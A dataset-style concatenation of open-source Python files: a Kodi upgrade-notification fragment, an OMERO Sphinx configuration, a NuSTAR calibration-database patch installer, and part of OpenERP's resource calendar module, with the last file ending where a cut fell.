localise(32002))
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
else:
log("Already notified one time for upgrading.")
def upgrade_message2( version_installed, version_available, version_stable, oldversion, upgrade,):
# shorten releasecandidate to rc
if version_installed['tag'] == 'releasecandidate':
version_installed['tag'] = 'rc'
if version_available['tag'] == 'releasecandidate':
version_available['tag'] = 'rc'
# convert json-rpc result to strings for usage
msg_current = '%i.%i %s%s' %(version_installed['major'],
version_installed['minor'],
version_installed['tag'],
version_installed.get('tagversion',''))
msg_available = version_available['major'] + '.' + version_available['minor'] + ' ' + version_available['tag'] + version_available.get('tagversion','')
msg_stable = version_stable['major'] + '.' + version_stable['minor'] + ' ' + version_stable['tag'] + version_stable.get('tagversion','')
msg = localise(32034) %(msg_current, msg_available)
wait_for_end_of_video()
# hack: convert current version number to stable string
# so users don't get notified again. remove in future
if ADDON.getSetting("lastnotified_version") == '0.1.24':
ADDON.setSetting("lastnotified_stable", msg_stable)
# Show different dialogs depending if there's a newer stable available.
# Also split them between xbmc and kodi notifications to reduce possible confusion.
# People will find out once they visit the website.
# For stable only notify once and when there's a newer stable available.
# Ignore any add-on updates as those only count for != stable
if oldversion == 'stable' and ADDON.getSetting("lastnotified_stable") != msg_stable:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32030),
localise(32031))
else:
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32032),
localise(32033))
ADDON.setSetting("lastnotified_stable", msg_stable)
elif oldversion != 'stable' and ADDON.getSetting("lastnotified_version") != msg_available:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
# point them to xbmc.org
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32031))
else:
#use kodi.tv
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32033))
# older skins don't support a text field in the OK dialog.
# let's use split lines for now. see code above.
'''
msg = localise(32034) %(msg_current, msg_available)
if oldversion == 'stable':
msg = msg + ' ' + localise(32030)
else:
msg = msg + ' ' + localise(32035)
msg = msg + ' ' + localise(32031)
xbmcgui.Dialog().ok(ADDONNAME, msg)
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
'''
ADDON.setSetting("lastnotified_version", msg_available)
else:
log("Already notified one time for upgrading.")
def wait_for_end_of_video():
# Don't show notify while watching a video
while xbmc.Player().isPlayingVideo() and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i = 0
while i < 10 and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i += 1 | gpl-2.0 | -4,388,351,131,310,801,400 | 38.482955 | 155 | 0.581894 | false |
sbesson/openmicroscopy | docs/sphinx-api/conf.py | 6 | 4384 | # -*- coding: utf-8 -*-
#
# OMERO.py API documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 23 12:22:32 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import sys, os
import os.path
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python')))
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python','omeroweb')))
os.environ['DJANGO_SETTINGS_MODULE'] = 'omeroweb.settings'
author = u'The Open Microscopy Environment'
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.todo', 'sphinx.ext.coverage']
autodoc_default_flags = ['members', 'undoc-members', 'private-members']
# General information about the project.
project = u'OMERO.py API'
targetname = 'OmeroPyAPI'
title = project + u' Documentation'
master_doc = 'index'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
release = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
# -- Options for HTML output ---------------------------------------------------
html_theme = 'api_theme'
# The suffix of source filenames.
source_suffix = '.rst'
# Output file base name for HTML help builder.
htmlhelp_basename = project+ ' doc'
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['../sphinx/common/themes', 'themes']
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', targetname + '.tex', title, author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'omeropyapi', title, author, 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', targetname, title, author, targetname,
'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| gpl-2.0 | 8,927,459,474,815,943,000 | 31.962406 | 103 | 0.681569 | false |
mfacorcoran/pycaldb | nustar_caldb/nustar_caldb_patch.py | 1 | 9035 | def patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging",
ck_file_exists='True'):
"""
CALLING SEQUENCE:
patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging")
The following is from /web_chroot/FTP/.caldb_staging/data/nustar/README_rev1.txt
20131028
========
installing patch version 20131007 - STEPS:
a) first created a full version of the existing nustar caldb in the
/FTP/caldb/data/nustar in the nustar/versions are via rsync:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions
[caldbmgr]: mkdir 20131007
[caldbmgr]: cd 20131007
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/bcf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/cpf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/index .
b) wget the patch (using the location given in Brian Grefenstette's e-mail):
[caldbmgr]: cd /FTP/caldb/staging/data/nustar/versions/20131007/
[caldbmgr]: wget ftp://hassif.srl.caltech.edu/pub/nustar/pipeline/20131007/NUSTARCALDB_patch20131007.tgz
c) Untar the patch:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions/20131007
[caldbmgr]: ls
fpm NUSTARCALDB_patch20131007.tgz
[caldbmgr]: tar -zxvf NUSTARCALDB_patch20131007.tgz
fpm/caldb.indx
fpm/index/caldb.indx20131007
fpm/bcf/arf/nuA20100101v006.arf
fpm/bcf/arf/nuB20100101v006.arf
... stuff deleted ...
fpm/bcf/instrument/nuAhkrange05_20100101v005.fits
fpm/bcf/instrument/nuAhkrange04_20100101v005.fits
fpm/bcf/instrument/nuAhkrange03_20100101v005.fits
fpm/bcf/instrument/nuAhkrange02_20100101v005.fits
c) then link the (now full) 20131007 version to staging/data/nustar/fpm:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar
[caldbmgr]: ln -nfs versions/20131007/fpm .
[caldbmgr]: ls -l
total 12
lrwxrwxrwx 1 caldbmgr caldb 21 Oct 28 15:31 fpm -> versions/20131007/fpm
-rw-r--r-- 1 caldbmgr caldb 1909 Oct 28 15:27 README.txt
drwxr-xr-x 2 caldbmgr caldb 4096 Oct 28 15:09 to_ingest
drwxr-xr-x 7 caldbmgr caldb_stage 4096 Oct 28 15:14 versions
d) from Brian's e-mail list of new files in the patch, created caldb_update_nustar_20131007.txt in the "to_ingest" subdirectory:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/to_ingest
[caldbmgr]: ls -l
total 16
-rw-r--r-- 1 caldbmgr caldb 8839 Aug 14 11:27 caldb_update_nustar_20130509.txt
-rw-r--r-- 1 caldbmgr caldb 1636 Oct 28 15:09 caldb_update_nustar_20131007.txt
lrwxrwxrwx 1 caldbmgr caldb 32 Aug 14 11:02 caldb_update.txt -> caldb_update_nustar_20130509.txt
e) to ingest the data (as in other missions) run /web_chroot/FTP/caldb/local/scripts/DATA_DELIVERIES/nustar_caldbupdate.csh
:param version: string in 'YYYYMMDD' format, from nustar patch notification (from BG)
:param nupatchworkdir: URL of directory where patch tar file is located, from BG
:param caldb: location where the full NuSTAR caldb is stored
:param caldbstage: location of caldb staging area
:return:
"""
import os
import ftputil
import tarfile
import datetime
import shutil
from pycaldb import ck_file_existence
from astropy.io import fits as pyfits
#
# create patch install directory
#
versiondir=caldbstage+"/data/nustar/versions/"+version.strip().lower()
patchinstalldir = versiondir
if os.path.isdir(versiondir):
ans = raw_input("{0} exists; Do you want to remove it (Y/n)? ".format(versiondir))
try:
if ans.upper().strip()[0] <> "N":
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
except IndexError: # user hit <CR> generating an empty string
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
else:
print("Creating {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
#
#create a full version of the existing nustar caldb in the
# $CALDB/data/nustar in the nustar/versions are via rsync:
# cdirs=['bcf','cpf','index', 'caldb.indx']
# for c in cdirs:
# cmd = "rsync -avz " + caldb + "/data/nustar/fpm/" + c + " " + patchinstalldir + "/fpm"
# if os.path.isdir(patchinstalldir+'/fpm/'+c):
# ans = raw_input('\nDirectory '+patchinstalldir+'/fpm/'+c+' Exists. Remove it and re-download (Y/n)? ')
# if ans.lower().strip()[0] == 'y':
# shutil.rmtree(patchinstalldir+'/'+c)
# else:
# cmd = "echo keeping pre-existing directory "+patchinstalldir+'/fpm/'+c
# print (cmd)
# os.system(cmd)
#
# get the patch file
#
host = ftputil.FTPHost(nupatchserver,'anonymous','[email protected]')
patchfiledir = nupatchworkdir+'/'+version.strip()
patchfile = 'NUSTARCALDB_patch'+version.strip()+'.tgz'
print('\nDownloading {0}...'.format(patchfile))
try:
host.download(patchfiledir+'/'+patchfile,patchinstalldir+'/'+patchfile,mode='b') # need mode flag for ftputil<3.0
except TypeError:
host.download(patchfiledir + '/' + patchfile, patchinstalldir + '/' + patchfile) # if mode flag not present (ftputil>=3.0)
#
# untar the file
#
print('\nExtracting {0} to {1}'.format(patchfile, patchinstalldir))
ptf = tarfile.open(patchinstalldir+'/'+patchfile)
ptf.extractall(patchinstalldir)
newfiles = ptf.getnames()
#
# Link the updated version to staging/data/nustar/fpm:
#
#
dst = caldbstage+'/data/nustar/fpm'
if os.path.islink(dst):
os.remove(dst)
print "Creating symbolic link from {0} to {1}".format(patchinstalldir+"/fpm", dst)
try:
os.symlink(patchinstalldir+'/fpm', dst)
except:
print "Problem creating symbolic link to "+dst+"; Returning"
return
#
# check that all files in the cif exist in the new caldb
#
if ck_file_exists:
print ("\nChecking existence of files in the caldb.indx file...")
cif = pyfits.open(caldbstage+'/data/nustar/fpm/caldb.indx')
missing = ck_file_existence(cif, caldb=caldbstage, quiet=True)
if len(missing) > 0:
print "\nThese files are missing from the caldb:"
for f in missing:
print f
#
# create update file in staging/nustar/to_ingest directory
#
update_txt='from: [email protected]\n' \
'Subject: caldb update nustar '+version.strip()+'\n' \
'Date: '+datetime.datetime.now().strftime("%Y-%m-%d %H:%M")+'\n' \
'To: [email protected]\n\n' \
'instrument=fpm\n' \
'caldbindexfile=caldb.indx'+version.strip()+'\n\n' \
'newfile\n'
for f in newfiles: # get file list from patch tarfile
name=f.split('fpm/')[1]
if not 'caldb.indx' in name.strip().lower(): # don't include caldb.indx files in ingest note
update_txt=update_txt+name+"\n"
update_txt=update_txt+'endnewfile\n'
ingestfilename = 'caldb_update_nustar_'+version.strip()+'.txt'
ingestfile = caldbstage+'/data/nustar/to_ingest/'+ingestfilename
print('Creating {0}'.format(ingestfile))
fingest = open(ingestfile,'w')
fingest.write(update_txt)
fingest.close()
#print('\nEdit {0} and enter list of new files from the update e-mail from BG'.format(ingestfile))
#
# make symlink to caldb_update.txt file
#
curdir=os.getcwd()
to_ingestdir = caldbstage+"/data/nustar/to_ingest"
updatefile='caldb_update.txt'
os.chdir(to_ingestdir)
print "Creating symbolic link from {0} to {1} in {2}".format(ingestfilename, updatefile,to_ingestdir)
if os.path.islink(updatefile):
os.remove(updatefile)
try:
os.symlink(ingestfile, updatefile)
except:
print "Problem creating symbolic link to "+updatefile+"; Returning"
return
os.chdir(curdir)
return
if __name__ == "__main__":
#
# for sshfs mounted directories
#
caldb="/fuse/caldb"
stage = '/fuse/caldb_stage'
patch_nustar_caldb('20160606', caldb=caldb, caldbstage=stage, ck_file_exists=False)
| gpl-2.0 | -8,444,047,767,977,949,000 | 39.698198 | 132 | 0.622247 | false |
camptocamp/ngo-addons-backport | addons/resource/resource.py | 35 | 25745 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pytz
from datetime import datetime, timedelta
from dateutil import rrule
import math
from faces import *
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare
from openerp.tools.translate import _
from itertools import groupby
from operator import itemgetter
class resource_calendar(osv.osv):
_name = "resource.calendar"
_description = "Resource Calendar"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'company_id' : fields.many2one('res.company', 'Company', required=False),
'attendance_ids' : fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time'),
'manager' : fields.many2one('res.users', 'Workgroup Manager'),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context)
}
def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None):
"""Calculates the Working Total Hours based on Resource Calendar and
given working day (datetime object).
@param resource_calendar_id: resource.calendar browse record
@param day: datetime object
@return: returns the working hours (as float) men should work on the given day if is in the attendance_ids of the resource_calendar_id (i.e if that day is a working day), returns 0.0 otherwise
"""
res = 0.0
for working_day in resource_calendar_id.attendance_ids:
if (int(working_day.dayofweek) + 1) == day.isoweekday():
res += working_day.hour_to - working_day.hour_from
return res
def _get_leaves(self, cr, uid, id, resource):
"""Private Method to Calculate resource Leaves days
@param id: resource calendar id
@param resource: resource id for which leaves will ew calculated
@return : returns the list of dates, where resource on leave in
resource.calendar.leaves object (e.g.['%Y-%m-%d', '%Y-%m-%d'])
"""
resource_cal_leaves = self.pool.get('resource.calendar.leaves')
dt_leave = []
resource_leave_ids = resource_cal_leaves.search(cr, uid, [('calendar_id','=',id), '|', ('resource_id','=',False), ('resource_id','=',resource)])
#res_leaves = resource_cal_leaves.read(cr, uid, resource_leave_ids, ['date_from', 'date_to'])
res_leaves = resource_cal_leaves.browse(cr, uid, resource_leave_ids)
for leave in res_leaves:
dtf = datetime.strptime(leave.date_from, '%Y-%m-%d %H:%M:%S')
dtt = datetime.strptime(leave.date_to, '%Y-%m-%d %H:%M:%S')
no = dtt - dtf
[dt_leave.append((dtf + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
dt_leave.sort()
return dt_leave
def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False):
"""
Calculates the working Schedule from supplied from date to till hours
will be satisfied based or resource calendar id. If resource is also
given then it will consider the resource leave also and than will
calculates resource working schedule
@param dt_from: datetime object, start of working scheduled
@param hours: float, total number working hours needed scheduled from
start date
@param resource : Optional Resource id, if supplied than resource leaves
will also taken into consideration for calculating working
schedule.
@return : List datetime object of working schedule based on supplies
params
"""
if not id:
td = int(hours)*3
return [(dt_from - timedelta(hours=td), dt_from)]
dt_leave = self._get_leaves(cr, uid, id, resource)
dt_leave.reverse()
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
while float_compare(todo, 0, 4) and maxrecur:
cr.execute("select hour_from,hour_to from resource_calendar_attendance where dayofweek='%s' and calendar_id=%s order by hour_from desc", (dt_from.weekday(),id))
for (hour_from,hour_to) in cr.fetchall():
leave_flag = False
if (hour_from<current_hour) and float_compare(todo, 0, 4):
m = min(hour_to, current_hour)
if (m-hour_from)>todo:
hour_from = m-todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(hour_from)), int((hour_from%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(m)), int((m%1) * 60))
result.append((d1, d2))
current_hour = hour_from
todo -= (m-hour_from)
dt_from -= timedelta(days=1)
current_hour = 24
maxrecur -= 1
result.reverse()
return result
# def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True):
def group(lst, key):
lst.sort(key=itemgetter(key))
grouped = groupby(lst, itemgetter(key))
return dict([(k, [v for v in itr]) for k, itr in grouped])
# END group
cr.execute("select calendar_id, dayofweek, hour_from, hour_to from resource_calendar_attendance order by hour_from")
hour_res = cr.dictfetchall()
hours_by_cal = group(hour_res, 'calendar_id')
results = {}
for d, hours, id in date_and_hours_by_cal:
dt_from = datetime.strptime(d, '%Y-%m-%d %H:%M:%S')
if not id:
td = int(hours)*3
results[(d, hours, id)] = [(dt_from, dt_from + timedelta(hours=td))]
continue
dt_leave = self._get_leaves(cr, uid, id, resource)
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
while float_compare(todo, 0, 4) and maxrecur:
for (hour_from,hour_to) in [(item['hour_from'], item['hour_to']) for item in hours_by_cal[id] if item['dayofweek'] == str(dt_from.weekday())]:
leave_flag = False
if (hour_to>current_hour) and float_compare(todo, 0, 4):
m = max(hour_from, current_hour)
if (hour_to-m)>todo:
hour_to = m+todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(m)), minutes=int((m%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(hour_to)), minutes=int((hour_to%1) * 60))
result.append((d1, d2))
current_hour = hour_to
todo -= (hour_to - m)
dt_from += timedelta(days=1)
current_hour = 0
maxrecur -= 1
results[(d, hours, id)] = result
return results
def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
"""Calculates Resource Working Internal Timing Based on Resource Calendar.
@param dt_from: start resource schedule calculation.
@param hours : total number of working hours to be scheduled.
@param resource: optional resource id, If supplied it will take care of
resource leave while scheduling.
@param byday: boolean flag bit enforce day wise scheduling
@return : list of scheduled working timing based on resource calendar.
"""
res = self.interval_get_multi(cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)]
return res
def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource: optional resource id, If given resource leave will be
considered.
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource)
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource_id: optional resource id, If given resource leave will be
considered.
@param timezone_from_uid: optional uid, if given we will considerer
working hours in that user timezone
@param exclude_leaves: optionnal, if set to True (default) we will exclude
resource leaves from working hours
@param context: current request context
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
utc_tz = pytz.timezone('UTC')
local_tz = utc_tz
if timezone_from_uid:
users_obj = self.pool.get('res.users')
user_timezone = users_obj.browse(cr, uid, timezone_from_uid, context=context).partner_id.tz
if user_timezone:
try:
local_tz = pytz.timezone(user_timezone)
except pytz.UnknownTimeZoneError:
pass # fallback to UTC as local timezone
def utc_to_local_zone(naive_datetime):
utc_dt = utc_tz.localize(naive_datetime, is_dst=False)
return utc_dt.astimezone(local_tz)
def float_time_convert(float_val):
factor = float_val < 0 and -1 or 1
val = abs(float_val)
return (factor * int(math.floor(val)), int(round((val % 1) * 60)))
# Get slots hours per day
# {day_of_week: [(8, 12), (13, 17), ...], ...}
hours_range_per_weekday = {}
if id:
cr.execute("select dayofweek, hour_from,hour_to from resource_calendar_attendance where calendar_id=%s order by hour_from", (id,))
for weekday, hour_from, hour_to in cr.fetchall():
weekday = int(weekday)
hours_range_per_weekday.setdefault(weekday, [])
hours_range_per_weekday[weekday].append((hour_from, hour_to))
else:
# considering default working hours (Monday -> Friday, 8 -> 12, 13 -> 17)
for weekday in range(5):
hours_range_per_weekday[weekday] = [(8, 12), (13, 17)]
## Interval between dt_from - dt_to
##
## dt_from dt_to
## =============|==================|============
## [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ]
##
## [ : start of range
## ] : end of range
##
## case 1: range end before interval start (skip)
## case 2: range overlap interval start (fit start to internal)
## case 3: range within interval
## case 4: range overlap interval end (fit end to interval)
## case 5: range start after interval end (skip)
interval_start = utc_to_local_zone(dt_from)
interval_end = utc_to_local_zone(dt_to)
hours_timedelta = timedelta()
# Get leaves for requested resource
dt_leaves = set([])
if exclude_leaves and id:
dt_leaves = set(self._get_leaves(cr, uid, id, resource=resource_id))
for day in rrule.rrule(rrule.DAILY, dtstart=interval_start,
until=interval_end+timedelta(days=1),
byweekday=hours_range_per_weekday.keys()):
if exclude_leaves and day.strftime('%Y-%m-%d') in dt_leaves:
# XXX: futher improve leave management to allow for partial day leave
continue
for (range_from, range_to) in hours_range_per_weekday.get(day.weekday(), []):
range_from_hour, range_from_min = float_time_convert(range_from)
range_to_hour, range_to_min = float_time_convert(range_to)
daytime_start = local_tz.localize(day.replace(hour=range_from_hour, minute=range_from_min, second=0, tzinfo=None))
daytime_end = local_tz.localize(day.replace(hour=range_to_hour, minute=range_to_min, second=0, tzinfo=None))
# case 1 & 5: time range out of interval
if daytime_end < interval_start or daytime_start > interval_end:
continue
# case 2 & 4: adjust start, end to fit within interval
daytime_start = max(daytime_start, interval_start)
daytime_end = min(daytime_end, interval_end)
# case 2+, 4+, 3
hours_timedelta += (daytime_end - daytime_start)
# return timedelta converted to hours
return (hours_timedelta.days * 24.0 + hours_timedelta.seconds / 3600.0)
resource_calendar()
class resource_calendar_attendance(osv.osv):
_name = "resource.calendar.attendance"
_description = "Work Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True),
'date_from' : fields.date('Starting Date'),
'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True),
'hour_to' : fields.float("Work to", required=True),
'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True),
}
_order = 'dayofweek, hour_from'
_defaults = {
'dayofweek' : '0'
}
resource_calendar_attendance()
def hours_time_string(hours):
""" convert a number of hours (float) into a string with format '%H:%M' """
minutes = int(round(hours * 60))
return "%02d:%02d" % divmod(minutes, 60)
class resource_resource(osv.osv):
_name = "resource.resource"
_description = "Resource Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'code': fields.char('Code', size=16),
'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."),
'company_id' : fields.many2one('res.company', 'Company'),
'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True),
'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'),
'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depict the efficiency of the resource to complete tasks. e.g resource put alone on a phase of 5 days with 5 tasks assigned to him, will show a load of 100% for this phase by default, but if we put a efficiency of 200%, then his load will only be 50%."),
'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the schedule of resource"),
}
_defaults = {
'resource_type' : 'user',
'time_efficiency' : 1,
'active' : True,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if not default.get('name', False):
default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name))
return super(resource_resource, self).copy(cr, uid, id, default, context)
def generate_resources(self, cr, uid, user_ids, calendar_id, context=None):
"""
Return a list of Resource Class objects for the resources allocated to the phase.
"""
resource_objs = {}
user_pool = self.pool.get('res.users')
for user in user_pool.browse(cr, uid, user_ids, context=context):
resource_objs[user.id] = {
'name' : user.name,
'vacation': [],
'efficiency': 1.0,
}
resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context)
if resource_ids:
for resource in self.browse(cr, uid, resource_ids, context=context):
resource_objs[user.id]['efficiency'] = resource.time_efficiency
resource_cal = resource.calendar_id.id
if resource_cal:
leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context)
resource_objs[user.id]['vacation'] += list(leaves)
return resource_objs
def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None):
"""
Compute the vacation from the working calendar of the resource.
@param calendar_id : working calendar of the project
@param resource_id : resource working on phase/task
@param resource_calendar : working calendar of the resource
"""
resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves')
leave_list = []
if resource_id:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id),
('calendar_id', '=', resource_calendar),
('resource_id', '=', resource_id)
], context=context)
else:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id),
('resource_id', '=', False)
], context=context)
leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context)
for i in range(len(leaves)):
dt_start = datetime.strptime(leaves[i]['date_from'], '%Y-%m-%d %H:%M:%S')
dt_end = datetime.strptime(leaves[i]['date_to'], '%Y-%m-%d %H:%M:%S')
no = dt_end - dt_start
[leave_list.append((dt_start + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
leave_list.sort()
return leave_list
def compute_working_calendar(self, cr, uid, calendar_id=False, context=None):
"""
Change the format of working calendar from 'Openerp' format to bring it into 'Faces' format.
@param calendar_id : working calendar of the project
"""
if not calendar_id:
# Calendar is not specified: working days: 24/7
return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'),
('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')]
resource_attendance_pool = self.pool.get('resource.calendar.attendance')
time_range = "8:00-8:00"
non_working = ""
week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"}
wk_days = {}
wk_time = {}
wktime_list = []
wktime_cal = []
week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context)
weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context)
# Convert time formats into appropriate format required
# and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')]
for week in weeks:
res_str = ""
day = None
if week_days.get(week['dayofweek'],False):
day = week_days[week['dayofweek']]
wk_days[week['dayofweek']] = week_days[week['dayofweek']]
else:
raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!'))
hour_from_str = hours_time_string(week['hour_from'])
hour_to_str = hours_time_string(week['hour_to'])
res_str = hour_from_str + '-' + hour_to_str
